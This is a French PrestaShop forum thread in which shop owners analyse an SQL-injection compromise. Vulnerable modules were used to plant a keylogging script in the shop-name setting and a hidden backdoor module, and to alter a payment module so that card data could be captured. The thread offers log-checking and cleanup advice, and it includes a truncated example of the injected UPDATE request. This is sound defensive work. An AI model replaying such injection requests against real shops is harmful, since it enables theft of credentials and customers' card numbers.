[jayb174]

This has happened to me twice in the last 5 days. I found that the script was added to the ps_configuration table and changed the value of PS_SHOP_NAME. Have you found any causes or solutions?

[Mediacom87]

il y a 24 minutes, jayb174 a dit :

Cela m'est arrivé deux fois au cours des cinq derniers jours. J'ai découvert que le script avait été ajouté à la table ps_configuration et qu'il avait modifié la valeur de PS_SHOP_NAME. Avez-vous trouvé des causes ou des solutions ?

Merci de respecter la langue du topic et de la section du forum.

[Tfloyd]

Bonjour,

Ca m'est aussi arrivé sur 2 sites différents cette dernière semaine.

De ce que j'ai pu en déduire voilà son fonctionnement :

• Il repère un module possédant une faille pour réaliser une injection sql. Ca peut être n'importe lequel, chez moi c'était 2 modules différents (un module interne spécifique à une boutique et le module smartblog)
• Une fois la faille repérée il effectue des requêtes SELECT sur la table INFORMATION_SCHEMA pour récupérer différentes infos dans la base de données
• Une fois ces informations récupérées, il connaît le nom de la base de données et peut commencer à y faire des UPDATE
• Il effectue une requête UPDATE sur nom de la boutique (le champ "nom de la boutique" dans Coordonnées & magasins) en y ajoutant le script softbylinux.
• Ce script peut ensuite être appelé le front mais également sur le backoffice, il semble qu'il se charge de récupérer tout ce qui est tapé (donc mots de passes, etc)
• Ce n'était pas le cas au début mais maintenant il semble que le nom de la boutique soit remis à sa valeur d'origine après quelques minutes, certainement pour rendre l'intrusion moins visible. Donc ce n'est pas parce que le nom de la boutique est normal que l'attaque n'a pas été faite.
• Si un mot de passe admin est récupéré, il se connecte et installe un module qui n'est visible que via ftp, mais pas depuis la page modules du BO. Vérifiez que vous n'avez pas un nouveau dossier "mymodule" dans le dossier "modules" de votre site. Si oui, regardez s'il contient un fichier suspect (chez moi myc.php). Si c'est le cas vous pouvez supprimer ce dossier. Je ne sais pas ce que fait exactement ce truc mais le contenu n'était pas joli joli, tout plein de références à du ssh, des mots de passes, etc
• Enfin, sur une des boutiques, il y a eu à priori une action manuelle, donc une personne se serait loggée en utilisant un mot de passe récupéré au préalable. Notre module de paiement par CB a été modifié pour passer en mode iframe, certainement pour récupérer les numéros de CB des clients. Coup de "chance", ce mode est incompatible sur notre boutique et donc l'iframe ne s'affichait pas et les clients ne pouvaient plus payer (ce qui nous a permit de comprendre qu'il y avait un soucis quelque part d'ailleurs)

Le plus important est donc de consulter vos fichiers access.log et de chercher des appels à "SELECT" ou "UPDATE", en général toujours faits sur la table "ps_configuration". Si vous voyez des lignes sortir, vous devrez être capable de voir le module qui a été utilisé pour réaliser l'injection sql en regardant l'url au début de cette même ligne.
La ligne en question ressemble à ça : 
/module/NOM_DU_MODULE/NOM_DU_CONTROLLEUR?p=61%27%3BUPDATE%20NOM_DE_LA_BASE.ps_configuration%20set%20value...

Une fois la faille trouvée vous pourrez la corriger ou carrément supprimer le module problématique si vous le pouvez. Malheureusement ça ne semble pas être un module unique qui est source du problème donc chaque boutique devra chercher elle même le module responsable.

Il faudra mettre à jour tous les mots de passes BO et par sécurité certainement ceux de la base de donnée et ftp également car je ne sais pas exactement ce qui peut être récupéré.

[jayb174]

34 minutes ago, Tfloyd said:

Bonjour,

Ca m'est aussi arrivé sur 2 sites différents cette dernière semaine.

De ce que j'ai pu en déduire voilà son fonctionnement :

• Il repère un module possédant une faille pour réaliser une injection sql. Ca peut être n'importe lequel, chez moi c'était 2 modules différents (un module interne spécifique à une boutique et le module smartblog)
• Une fois la faille repérée il effectue des requêtes SELECT sur la table INFORMATION_SCHEMA pour récupérer différentes infos dans la base de données
• Une fois ces informations récupérées, il connaît le nom de la base de données et peut commencer à y faire des UPDATE
• Il effectue une requête UPDATE sur nom de la boutique (le champ "nom de la boutique" dans Coordonnées & magasins) en y ajoutant le script softbylinux.
• Ce script peut ensuite être appelé le front mais également sur le backoffice, il semble qu'il se charge de récupérer tout ce qui est tapé (donc mots de passes, etc)
• Ce n'était pas le cas au début mais maintenant il semble que le nom de la boutique soit remis à sa valeur d'origine après quelques minutes, certainement pour rendre l'intrusion moins visible. Donc ce n'est pas parce que le nom de la boutique est normal que l'attaque n'a pas été faite.
• Si un mot de passe admin est récupéré, il se connecte et installe un module qui n'est visible que via ftp, mais pas depuis la page modules du BO. Vérifiez que vous n'avez pas un nouveau dossier "mymodule" dans le dossier "modules" de votre site. Si oui, regardez s'il contient un fichier suspect (chez moi myc.php). Si c'est le cas vous pouvez supprimer ce dossier. Je ne sais pas ce que fait exactement ce truc mais le contenu n'était pas joli joli, tout plein de références à du ssh, des mots de passes, etc
• Enfin, sur une des boutiques, il y a eu à priori une action manuelle, donc une personne se serait loggée en utilisant un mot de passe récupéré au préalable. Notre module de paiement par CB a été modifié pour passer en mode iframe, certainement pour récupérer les numéros de CB des clients. Coup de "chance", ce mode est incompatible sur notre boutique et donc l'iframe ne s'affichait pas et les clients ne pouvaient plus payer (ce qui nous a permit de comprendre qu'il y avait un soucis quelque part d'ailleurs)

Le plus important est donc de consulter vos fichiers access.log et de chercher des appels à "SELECT" ou "UPDATE", en général toujours faits sur la table "ps_configuration". Si vous voyez des lignes sortir, vous devrez être capable de voir le module qui a été utilisé pour réaliser l'injection sql en regardant l'url au début de cette même ligne.
La ligne en question ressemble à ça : 
/module/NOM_DU_MODULE/NOM_DU_CONTROLLEUR?p=61%27%3BUPDATE%20NOM_DE_LA_BASE.ps_configuration%20set%20value...

Une fois la faille trouvée vous pourrez la corriger ou carrément supprimer le module problématique si vous le pouvez. Malheureusement ça ne semble pas être un module unique qui est source du problème donc chaque boutique devra chercher elle même le module responsable.

Il faudra mettre à jour tous les mots de passes BO et par sécurité certainement ceux de la base de donnée et ftp également car je ne sais pas exactement ce qui peut être récupéré.

 

Merci pour le rapport. J'ai eu la même expérience que la vôtre et je l'ai corrigé il y a quelques jours, sauf que mes fichiers n'ont pas été modifiés. Dans mon cas, le module problématique était ph_simpleblog. Celui-ci a été signalé comme malveillant dans le passé. https://security.friendsofpresta.org/module/2021/08/20/ph_simpleblog.html